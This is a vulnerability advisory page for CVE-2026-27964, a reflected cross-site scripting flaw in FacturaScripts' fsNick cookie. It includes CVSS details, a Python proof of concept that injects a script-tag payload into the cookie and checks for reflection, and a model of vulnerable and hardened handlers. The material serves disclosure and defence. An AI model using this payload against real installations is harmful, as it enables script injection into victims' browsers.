Security Vulnerability Report
CVE-2026-27964 CVSS 3.9 LOW

CVE-2026-27964

Published: 2026-05-18 22:16:39
Last Modified: 2026-05-19 14:44:43

Description

FacturaScripts is open source accounting and invoicing software. Versions 2025.7 and prior contain a reflected cross-site scripting (XSS) vulnerability through the fsNick cookie. The application reflects the cookie's value directly into the HTML without sanitization: the fsNick value is rendered into the DOM without encoding. Although the server rejects the modified session and forces a logout, the HTML containing the payload reaches the browser first, so the script executes on page load, before the redirect takes effect. This issue has been fixed in version 2025.8.

CVSS Details

CVSS Score
3.9
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Exploitability Score
1.3
Impact Score
2.5
Weakness
CWE-79

Configurations (Affected Products)


FacturaScripts <= 2025.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

target_url = "http://target-facturascripts-url"

# The malicious payload to be executed via XSS
xss_payload = "<script>alert('CVE-2026-27964 XSS');</script>"

# Create a session to manage cookies
session = requests.Session()

# Set the vulnerable 'fsNick' cookie with the payload
# In a real scenario, this cookie might be set via JavaScript or client-side manipulation
session.cookies.set('fsNick', xss_payload)

try:
    # Send the request to the target
    response = session.get(target_url)

    # Check if the payload is reflected in the response body
    if xss_payload in response.text:
        print("[+] Vulnerability Confirmed: The payload was reflected in the response.")
        print("[+] If executed in a browser, the script would run before the redirect.")
    else:
        print("[-] Vulnerability Not Detected or Patched.")
except Exception as e:
    print(f"Error occurred: {e}")
```
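The render order that the description and the PoC above depend on, modelled in Python as an added illustration (not FacturaScripts' own code, which is PHP): the vulnerable handler writes the raw fsNick value into the page before its session check, so the logout redirect is appended after the markup; the hardened handler rejects the session before emitting any body and HTML-encodes the value. The session store, handler names and cookie values are constructed for this example.

```python
from html import escape

# Constructed stand-in for the server-side session store (assumption for this
# example): only these nicks are treated as having a valid session.
VALID_SESSIONS = {"alice", "o'brien"}

# Client-side logout the vulnerable handler appends once it notices a bad session.
LOGOUT_REDIRECT = "<script>window.location='/logout';</script>"


def render_vulnerable(cookies: dict) -> tuple[int, str]:
    """Pattern the advisory describes: the page body is built with the raw
    fsNick value first; the session check only appends a redirect afterwards,
    so the unencoded value reaches the browser and runs before the redirect."""
    nick = cookies.get("fsNick", "")
    body = f"<html><body><span class='nick'>{nick}</span>"
    if nick not in VALID_SESSIONS:
        # Too late: the reflected markup is already part of the body being sent.
        body += LOGOUT_REDIRECT
    return 200, body + "</body></html>"


def render_hardened(cookies: dict) -> tuple[int, str]:
    """Fix: reject an invalid session before any markup is emitted (HTTP 302
    with an empty body) and HTML-encode the cookie value where it is rendered."""
    nick = cookies.get("fsNick", "")
    if nick not in VALID_SESSIONS:
        return 302, ""
    safe_nick = escape(nick, quote=True)
    return 200, f"<html><body><span class='nick'>{safe_nick}</span></body></html>"


def reflects_unencoded(cookies: dict, body: str) -> bool:
    """Detection check (same idea as the PoC above): true when the fsNick value
    contains characters HTML encoding would change and appears verbatim in the body."""
    nick = cookies.get("fsNick", "")
    return bool(nick) and nick != escape(nick, quote=True) and nick in body


if __name__ == "__main__":
    # Constructed request: a forged cookie carrying markup and no valid session.
    forged = {"fsNick": "<script>alert('xss')</script>"}
    for name, handler in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        status, body = handler(forged)
        print(f"{name}: status={status} reflects_unencoded={reflects_unencoded(forged, body)}")
```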

References

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Fix commit: https://github.com/NeoRazorX/facturascripts/commit/9066e10326029adf012114e27eb5f3f33f78ecfd
GitHub Security Advisory: https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-gq5c-rw37-g46c